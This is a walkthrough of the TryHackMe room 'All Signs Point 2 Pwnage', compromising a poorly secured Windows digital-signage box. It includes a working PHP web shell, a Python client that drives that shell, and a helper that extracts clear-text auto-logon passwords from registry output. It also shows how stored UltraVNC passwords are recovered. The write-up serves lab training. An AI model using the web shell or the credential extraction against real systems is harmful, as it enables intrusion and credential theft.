TryHackMe: All Signs Point 2 Pwnage

TryHackMe: https://tryhackme.com/room/allsignspoint2pwnage

Intro

This is the first TryHackMe room I have created; it tries to emulate a rushed and poorly secured Windows Digital Signage system.

Task #1 - Enumeration

How many TCP ports under 1024 are open?

For this we will use good old nmap. Unfortunately the VM takes up to 15 minutes to boot and for its services to start, so a scan run too early will show fewer open ports than are really there; rescan once the box has settled. Note that -p0-1024 also scans port 1024 itself, whereas the question asks about ports below 1024.

nmap -Pn -p0-1024 {MACHINE-IP}
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:56 GMT
Nmap scan report for allsignspoint2pwnage (10.10.161.50)
Host is up (0.069s latency).
Not shown: 1019 closed ports
PORT    STATE SERVICE
[ REDACTED ]

What is the hidden share?

Accessing one of the services listed above, we find a note. Using this note and some knowledge of Windows file sharing (a share whose name ends in $ is hidden from browse lists but can still be connected to directly by name) we can guess that the share is

[REDACTED]$

Task #2 - Foothold

Using the hidden share we can upload a PHP script, which we can then access via http://machineip/images/ . It may take several attempts to find a PHP script that works, because Windows Defender detects and deletes it.

<?php
// Minimal web shell: runs the value of the cmd query parameter, e.g. shell.php?cmd=whoami
// The command is echoed first, and system() writes its output straight after the echo.
echo "You entered <pre>" . $_GET['cmd'];
system($_GET['cmd']);
echo "</pre>";
?>
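A small client for the web shell above, added here as an example; it is not code from the write-up. It URL-encodes the command, strips the shell's own "You entered" echo from the response, and parses quser output to find who holds the console session. The target URL, the file name shell.php and the quser sample are assumptions and constructed data, not the room's real values.

```python
"""Added example: a small Python client for the PHP web shell shown above.

This is not code from the write-up. It assumes the shell was uploaded as
shell.php into the hidden share and is reachable at http://<MACHINE-IP>/images/shell.php
(TARGET below is a placeholder, not the room's real address).
"""
from __future__ import annotations

import re
import urllib.parse
import urllib.request

TARGET = "http://10.10.161.50/images/shell.php"  # placeholder, adjust to the box
ECHO_PREFIX = "You entered <pre>"  # what the PHP shell prints before the command output


def build_url(base: str, cmd: str) -> str:
    """URL-encode the command so spaces, quotes, pipes and & survive the query string."""
    return base + "?" + urllib.parse.urlencode({"cmd": cmd})


def parse_output(body: str, cmd: str) -> str:
    """Return only the command output.

    The shell echoes ECHO_PREFIX + cmd and then lets system() write directly after it,
    with no newline in between, which is why the write-up's quser header appears on the
    same line as the word 'quser'.
    """
    prefix = ECHO_PREFIX + cmd
    if body.startswith(prefix):
        body = body[len(prefix):]
    return body.replace("</pre>", "").strip()


def run(cmd: str, base: str = TARGET, timeout: int = 30) -> str:
    """Execute cmd through the web shell and return its output (needs network access)."""
    with urllib.request.urlopen(build_url(base, cmd), timeout=timeout) as resp:
        return parse_output(resp.read().decode("utf-8", "replace"), cmd)


# One quser row: optional '>' marking the session the command ran from, user name,
# optional session name, numeric ID, state. Disconnected sessions have an empty
# SESSIONNAME column, which the optional group handles.
QUSER_ROW = re.compile(r"^\s*(>?)(\S+)\s+(?:(\S+)\s+)?(\d+)\s+(\w+)")


def parse_quser(text: str) -> list[dict]:
    """Turn quser output into a list of session dicts."""
    sessions = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("USERNAME"):
            continue
        m = QUSER_ROW.match(line)
        if m:
            current, user, session, sid, state = m.groups()
            sessions.append({"user": user, "session": session or "", "id": int(sid),
                             "state": state, "current": current == ">"})
    return sessions


def console_user(text: str) -> str | None:
    """Name of the user holding the console session, or None if nobody is logged on there."""
    for s in parse_quser(text):
        if s["session"] == "console":
            return s["user"]
    return None


# Constructed sample of what the shell returns for ?cmd=quser (not real room output).
SAMPLE_QUSER_BODY = (
    "You entered <pre>quser USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME\n"
    ">someuser                 console             1  Active      none   14/11/2020 17:40\n"
    " otheruser                                    2  Disc           5   14/11/2020 17:50\n"
)

if __name__ == "__main__":
    out = parse_output(SAMPLE_QUSER_BODY, "quser")
    print(console_user(out))
    # Live use against the box: print(run("quser")); print(run("net share"))
```

Because the shell runs whatever cmd.exe is handed, quoting is the usual pitfall; letting urlencode do the escaping means a command such as type "C:\Users\x\Desktop\user.txt" arrives intact.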

What user is signed into the console session?

Using the above script and the quser command we can see the users logged in. The > marks the session the command was run from, and the SESSIONNAME column tells us which user has the console.

quser
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>[REDACTED]                  console             1  Active      none   

What hidden share is only remotely accessible as an administrative account?

Using the net share command we can see what other shares exist. The built-in administrative shares that Windows creates by default are hidden ($ suffix) and can only be reached remotely with an administrative account.

[REDACTED]

What is the content of user.txt?

Using the PHP script we can read (type) or copy the file from the user's desktop:

thm{[REDACTED]}

Task #3 - Pwnage

This task basically highlights some of the mistakes that can be made when setting up a system like this, and where useful information can be found.

What is the User's Password?

The desktop is set to log in automatically. There are a couple of ways of doing this, but on this box the registry is used: the Winlogon key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) holds AutoAdminLogon, DefaultUserName and, in this configuration, DefaultPassword in clear text, readable by any user on the machine.

[REDACTED]
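A check for a registry-based auto-logon, added here as an example and not the write-up's own code. It parses the output of reg query on the Winlogon key, the way it comes back through the web shell, and reports where the password lives. It goes slightly beyond the page in covering the other common setup, the Sysinternals Autologon tool, which keeps the password in an LSA secret instead of a plain registry value. The sample output, user name, domain and password below are constructed placeholders.

```python
"""Added example (not from the write-up): spot an auto-logon configured in the registry.

Windows reads auto-logon settings from
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (AutoAdminLogon,
DefaultUserName, DefaultDomainName, DefaultPassword). This parses the output of
`reg query` on that key as it would be returned through the web shell.
"""
from __future__ import annotations

import re

WINLOGON_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
REG_QUERY_CMD = f'reg query "{WINLOGON_KEY}"'  # what to send as ?cmd= to the web shell

# reg query prints each value as: <indent>name<spaces>REG_TYPE<spaces>data
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s*(.*?)\s*$")


def parse_reg_query(text: str) -> dict[str, str]:
    """Map value names to their data (types are dropped; data keeps inner spaces)."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, _type, data = m.groups()
            values[name] = data
    return values


def autologon_status(values: dict[str, str]) -> dict:
    """Summarise what the Winlogon values say about automatic logon."""
    enabled = values.get("AutoAdminLogon", "0").strip() == "1"
    user = values.get("DefaultUserName")
    domain = values.get("DefaultDomainName")
    password = values.get("DefaultPassword")
    if not enabled:
        where = "auto-logon disabled"
    elif password is not None:
        where = "clear text in registry (DefaultPassword)"
    else:
        # Auto-logon is on but there is no DefaultPassword value: the other common
        # setup (e.g. the Sysinternals Autologon tool) keeps the password in the LSA
        # secret named DefaultPassword, which needs SYSTEM rights to read.
        where = "LSA secret DefaultPassword (not readable from an unprivileged shell)"
    return {"enabled": enabled, "user": user, "domain": domain,
            "password": password, "password_location": where}


# Constructed sample of reg query output; machine name, user and password are placeholders.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    DefaultDomainName    REG_SZ    SIGNAGE-PC
    DefaultUserName    REG_SZ    someuser
    DefaultPassword    REG_SZ    Sample Pass 123
    AutoAdminLogon    REG_SZ    1
    Shell    REG_SZ    explorer.exe
"""

if __name__ == "__main__":
    print(REG_QUERY_CMD)
    print(autologon_status(parse_reg_query(SAMPLE_REG_OUTPUT)))
```

The data column is captured to end of line on purpose: passwords with spaces are common and truncating at the first space would silently return the wrong value.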

What is the Administrator's Password?

The hidden share above contains the installation files used by the technician to set up the system. It looks like the Admin password is set to the same value on every machine they configure so that their scripts can run, which means one readable script gives up the local Administrator password for the whole fleet.

What executable is used to run the installer with the Administrator username and password?

The script above containing the password uses a command so that the password does not need to be entered manually; the executable it calls is also contained in this folder.

What is the VNC Password?

UltraVNC is installed on the machine; it stores its passwords encrypted in an ini file. This can be found in the install directory (C:\Program Files...) and also in the installation-files share mentioned above.

[ultravnc]
passwd=[REDACTED]
passwd2=[REDACTED]
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0

The file contains two passwords: the first is the full-access login password, the second is the view-only password. The "encryption" is DES with a fixed key that is the same in every VNC build, so anyone who can read the file can recover both. Some research via Google returns vncpwd, downloadable from http://aluigi.altervista.org/pwdrec.htm, which decrypts the stored values.

What is the content of the admin flag?

This is on the Administrator's Desktop, which the Administrator password recovered above gives us access to.

Thoughts/Credits

This is the first room I have created and I had fun doing so; writing the webpage took me a bit longer than I thought and reminded me how much I dislike JavaScript.

Hopefully, running through this box, you have learnt something that you can use in future.

I would like to thank BigMark82 and RockShox, my partners in crime. Also a shout out to r1gormort1s for encouraging me to make a room; check out their room StartUp, which was fun to do.